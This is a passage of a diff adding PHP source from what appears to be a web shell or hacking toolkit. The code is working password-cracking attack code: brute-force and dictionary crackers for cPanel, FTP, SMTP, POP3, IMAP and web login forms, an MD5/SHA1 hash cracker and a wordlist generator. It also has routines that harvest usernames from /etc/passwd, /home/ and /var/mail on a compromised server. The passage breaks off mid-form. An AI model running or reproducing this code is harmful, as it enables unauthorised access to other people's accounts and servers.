+                                <option value="numberssymbols">Numbers + Symbols</option>
+                                <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
+                                <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
+                                <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
+            </select><br/>
+                    <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Min Bruteforce Length:</font>
+                        <input type="text" name="min_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $min_length;?>"/><br/>
+                        <font style="font-weight:700" size="2" face="Tahoma" color="#008000">Max Bruteforce Length:</font>
+                        <input type="text" name="max_length" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $max_length;?>"/>
+                        <p align="center"><input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p>
+                </p>
+                </td>
+         </tr>
+ 
+ </table>
+ </form>
+ 
+<?php
+function brute()
+{
+        global $vals,$min_length,$max_length;
+        global $target,$pureuser,$connect_timeout;
+        $min=$min_length;
+        $max=$max_length;
+        $A = array();
+        $numVals = count($vals);
+        $incDone = "";
+        $realMax = "";
+        $currentVal = "";
+        $firstVal = "";
+        for ($i = 0; $i < ($max + 1); $i++) {
+                $A[$i] = -1;
+        }
+        
+        for ($i = 0; $i < $max; $i++) {
+                $realMax = $realMax . $vals[$numVals - 1];
+        }
+        for ($i = 0; $i < $min; $i++) {
+                $A[$i] = $vals[0];
+        }
+        $i = 0;
+        while ($A[$i] != -1) {
+                $firstVal .= $A[$i];
+                $i++;
+        }
+        //echo $firstVal . "<br>";
+        cpanel_check($target,$pureuser,$firstVal,$connect_timeout);
+        
+        while (1) {
+                for ($i = 0; $i < ($max + 1); $i++) {
+                        if ($A[$i] == -1) {
+                                break;
+                        }
+                }
+                $i--;
+                $incDone = 0;
+                while (!$incDone) {     
+                        for ($j = 0; $j < $numVals; $j++) {
+                                if ($A[$i] == $vals[$j]) {
+                                        break;
+                                }
+                        }
+                        if ($j == ($numVals - 1)) {
+                                $A[$i] = $vals[0];
+                                $i--;
+                                if ($i < 0) {
+                                        for ($i = 0; $i < ($max + 1); $i++) {
+                                                if ($A[$i] == -1) {
+                                                        break;
+                                                }
+                                        }
+                                        $A[$i] = $vals[0];
+                                        $A[$i + 1] = -1;
+                                        $incDone = 1;
+                                        print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking<br>";
+                                }
+                        } else {
+                                $A[$i] = $vals[$j + 1];
+                                $incDone = 1;
+                        }
+                }
+                $i = 0;
+                $currentVal = "";
+                while ($A[$i] != -1) {
+                        $currentVal = $currentVal . $A[$i];
+                        $i++;
+                }
+                cpanel_check($target,$pureuser,$currentVal,$connect_timeout);
+                //echo $currentVal . "<br>";
+                if ($currentVal == $realMax) {
+                        return 0;
+                }
+        }
+}
+function getmicrotimev() {
+   list($usec, $sec) = explode(" ",microtime());
+   return ((float)$usec + (float)$sec);
+} 
+
+function ftp_check($host,$user,$pass,$timeout)
+{
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, "ftp://$host");
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+ curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
+ curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+ curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+ curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+ $data = curl_exec($ch);
+ if ( curl_errno($ch) == 28 )
+ {
+ print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
+ <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
+ Please Check The Target Hostname .</font></font></b></p>";exit;
+ }
+ else if ( curl_errno($ch) == 0 )
+ {
+  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
+ Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
+ and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
+ }
+ curl_close($ch);
+}
+function cpanel_check($host,$user,$pass,$timeout)
+{
+ global $cpanel_port;
+ $ch = curl_init();
+ //echo "http://$host:".$cpanel_port." $user $pass<br>";
+ curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
+ curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
+ curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+ curl_setopt($ch, CURLOPT_FAILONERROR, 1);
+ $data = curl_exec($ch);
+ if ( curl_errno($ch) == 28 )
+ {
+  print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
+  <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
+  Please Check The Target Hostname .</font></font></b></p>";exit;
+ }
+ else if ( curl_errno($ch) == 0 )
+ {
+  print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Comic Sans MS\"   style=\"font-size: 9pt\"><b><font color=\"#008000\"> 
+  Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
+  and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
+ }
+ curl_close($ch);
+}
+
+$time_start = getmicrotime();
+
+if(isset($submit) && !empty($submit))
+{
+ if(empty($users) && empty($pass) )
+ {
+   print "<p><font face=\"Comic Sans MS\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; }
+ if(empty($users)){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; }
+ if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; };
+ $userlist=explode("\n",$users);
+ $passlist=explode("\n",$pass);
+ print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
+ LETS GAME BEGIN ;) ...</font></b><br><br>";
+
+ if(isset($_POST['connect_timeout']))
+ {
+  $connect_timeout=$_POST['connect_timeout'];
+ }
+
+ if($cracktype == "ftp")
+ {
+  foreach ($userlist as $user) 
+  {
+   $pureuser = trim($user);
+   foreach ($passlist as $password ) 
+   {
+     $purepass = trim($password);
+     ftp_check($target,$pureuser,$purepass,$connect_timeout);
+   }
+  }
+ }
+ 
+ if ($cracktype == "cpanel" || $cracktype == "cpanel2")
+ {
+  if($cracktype == "cpanel2")
+  {
+   $cpanel_port="23";
+  }
+  else
+   $cpanel_port="2082";
+  
+  foreach ($userlist as $user) 
+  {
+   $pureuser = trim($user);
+   print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\"  style=\"font-size: 9pt\" color=\"#FF0800\">
+   Please put some good password to crack user $pureuser    :(  ... </font></b>";
+   if($_POST['bruteforce']=="true")
+   {
+    echo " bruteforcing ..";
+        echo "<br>";
+        brute();
+   }
+   else
+   {
+         echo "<br>"; 
+         foreach ($passlist as $password ) 
+     {
+       $purepass = trim($password);
+       cpanel_check($target,$pureuser,$purepass,$connect_timeout);
+     }
+   }
+  }
+  $time_end = getmicrotime();
+$time = $time_end - $time_start; 
+ print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">
+ Cracking Finished. Elapsed time: $time</font> seconds</b><br><br>";
+  }
+}
+
+
+
+?>
+
+    <table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#006A00" >
+          <tr>
+           <td>
+             <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="20" name="S1" cols="173">
+         <?php
+   if (isset($_GET['user']))
+      system('ls /var/mail'); 
+   if (isset($_POST['grab_users1'])) //grab users from /etc/passwd
+   {
+          $lines=file("/etc/passwd");
+          foreach($lines as $nr=>$val)
+          {
+           $str=explode(":",$val);
+           echo $str[0]."\n";
+          }
+         
+   }
+   if (isset($_POST['grab_users2']))
+    {
+     $dir = "/home/";
+     if ($dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+            echo $file. "\n";
+        }
+                        closedir($dh);
+                }
+        }
+?>
+        </textarea>
+           </td>
+          </tr>
+          <tr>
+          <td valign="top"><p align="center">
+            <table>
+         <tr >
+                 <td>
+          <form action="" method="POST">
+                     <input type="hidden" value="true" name="grab_users1"></input>
+             <input type=submit value="Grab Usernames from /etc/passwd" width="217px"></input>
+                  </form>
+                  </td>
+                 
+                 <td>
+           <form action="" method="POST">
+             <input type="hidden" value="true" name="grab_users2" ></input>
+             <input style="width: 217px;" type=submit value="Grab Usernames from /home/" ></input>
+           </form>
+                   </td>
+        <td>
+           <form action="" method="POST">
+              <input type="hidden" value="true" name="grab_users3"></input>
+              <input style="width: 217px;" type=submit value="Grab Usernames from /home/ II"></input>
+           </form>
+                 </td>
+         </tr>
+        </table></p>
+                </td>
+          </tr>
+        </table>
+        <?php
+if (isset($_POST['grab_users3']))
+{
+error_reporting(0);
+$dir = "/home/";
+if ($dh = opendir($dir))
+{
+$f = readdir($dh);$f = readdir($dh);
+while (($f = readdir($dh)) !== false)
+{
+//echo $f. "\n";
+$f.="/";
+$dh2=opendir($dir.$f);
+$f2 = readdir($dh2);$f2 = readdir($dh2);
+while (($f2 = readdir($dh2)) !== false)
+{
+//echo $f2. "\n";
+$f2.="/";
+$dh3=opendir($dir.$f.$f2);
+$f3 = readdir($dh3);$f3 = readdir($dh3);
+while (($f3 = readdir($dh3)) !== false)
+{
+echo $f3. "<br>";
+}
+}
+
+}
+closedir($dh);
+}
+}
+?>
+ 
+ 
+</div> 
+
+<?php
+}
+
+if ($act == "hash")
+{
+global $errorbox,$t,$et,$hcwd;
+if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+$hash=strtoupper($_REQUEST['hash']);
+echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
+$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
+while(!feof($dictionary)){
+$word=trim(fgets($dictionary)," \n\r");
+if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
+}
+echo "Done!</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+echo "<center><table width=\"30%\">Hash cracker:</td><td ></td></tr><form method=\"POST\"><tr><td width=\"30%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" ><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></table></center>";
+echo $eval_php_code;
+}
+
+if ($act == "smtp")
+{
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br/>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$smtp=smtplogiN($target,$user,$pass,5);
+if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($smtp){echo "U: $user P: $pass<br/>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else 
+{
+echo "<center>SMTP cracker:$crack";
+}
+
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">SMTP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+
+
+}
+
+if ($act == "pop3")
+{
+
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$pop3=pop3logiN($target,$user,$pass);
+if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else 
+{ echo "<center>POP3 cracker:$crack</center>";
+}
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">POP3 cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form action=\"\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+
+}
+if ($act == "ftp")
+{
+global $errorbox,$t,$et,$crack;
+if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
+if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
+ftp_close($ftp);
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else 
+{
+echo "<center>FTP cracker:$crack</center>";
+}
+echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";
+
+}
+}
+
+if ($act == "imap")
+{
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$imap=imaplogiN($target,$user,$pass);
+if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
+if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br/>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else 
+{
+echo "<center>IMAP cracker:$crack</center>";
+}
+print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');
+
+}
+
+if ($act == "dic")
+{
+global $errorbox,$windows,$footer,$t,$et,$hcwd;
+if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
+if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
+$min = $_REQUEST['min'];
+$max = $_REQUEST['max'];
+if($max<$min)die($errorbox ."Bad input!$et". $footer);
+$s =$w="";
+$out = $_REQUEST['output'];
+$r = ($_REQUEST['range']=='a' )?'a':'A';
+if ($_REQUEST['range']==0) $r=0;
+for($i=0;$i<$min;$i++) $s.=$r;
+$dic = fopen($out,'a');
+if(is_nan($r)){
+while(strlen($s)<=$max){
+$w = $s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+else{
+while(strlen($w)<=$max){
+$w =(string)str_repeat("0",($min - strlen($s))).$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+fclose($dic);
+echo "<font color=yellow>Done</font>";
+}
+if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
+$input=fopen($_REQUEST['input'],'r');
+if (!$input){
+if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+else{
+$input=explode("\n",shelL("cat $input"));
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+foreach ($input as $in){
+$user = $in;
+$user = trim(fgets($in)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=yellow>Done</font>";
+}
+}
+}
+else{
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+while (!feof($input)){
+$user = trim(fgets($input)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=yellow>Done</font>";
+}
+else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+}
+}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
+$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
+if($combo && $res){
+$file=file($_REQUEST['output']);
+$output=fopen($_REQUEST['output'],'w');
+foreach ($file as $v)fwrite($output,"$v:$v\n");
+fclose($output);
+}
+echo "<font color=yellow>Done</font>";
+}else{
+$temp=whereistmP();
+echo "<center>
+<table>
+<tr valign=top><td>
+<table>Wordlist generator:<form method=\"POST\">
+<tr>
+<td width=\"20%\" bgcolor=\"#666666\">Range:</td>
+<td bgcolor=\"#666666\">
+<select name=range>
+<option value=a>a-z</option>
+<option value=Z>A-Z</option>
+<option value=0>0-9</option></select>
+</td></tr>
+<tr>
+<td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>
+<td bgcolor=\"#808080\">
+<select name=min>
+<option value=1>1</option>
+<option value=2>2</option>
+<option value=3>3</option>
+<option value=4>4</option>
+<option value=5>5</option>
+<option value=6>6</option>
+<option value=7>7</option>
+<option value=8>8</option>
+<option value=9>9</option>
+<option value=10>10</option>
+</select>
+</td></tr>
+<tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>
+<td bgcolor=\"#666666\">
+<select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>
+</td></tr>
+<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
+<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>
+<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>
+</td><td>
+<table>Grab dictionary:
+<form method=\"POST\">
+<tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>
+<td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>
+<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>
+<td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
+<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
+<tr>
+<td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>
+</table>
+</td><td>
+<table>Download dictionary:<form method=\"POST\">
+<tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>
+<tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
+<tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
+<tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>
+</td>
+</tr></table>
+</center>             ";}
+}
+
+if ($act == "htmlform")
+{
+global $errorbox,$footer,$et,$hcwd;
+if(!empty($_REQUEST['start'])){
+$url=$_REQUEST['target'];
+$uf=$_REQUEST['userf'];
+$pf=$_REQUEST['passf'];
+$sf=$_REQUEST['submitf'];
+$sv=$_REQUEST['submitv'];
+$method=$_REQUEST['method'];
+$fail=$_REQUEST['fail'];
+$dic=$_REQUEST['dictionary'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
+$dictionary=fopen($dic,'r');
+echo "<font color=blue>Cracking started...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$url.="?$uf=$user&$pf=$pass&$sf=$sv";
+$res=check_urL($url,$method,$fail,12);
+if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
+flusheR();
+}
+fclose($dictionary);
+echo "Done!</font><br>";
+}
+else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" 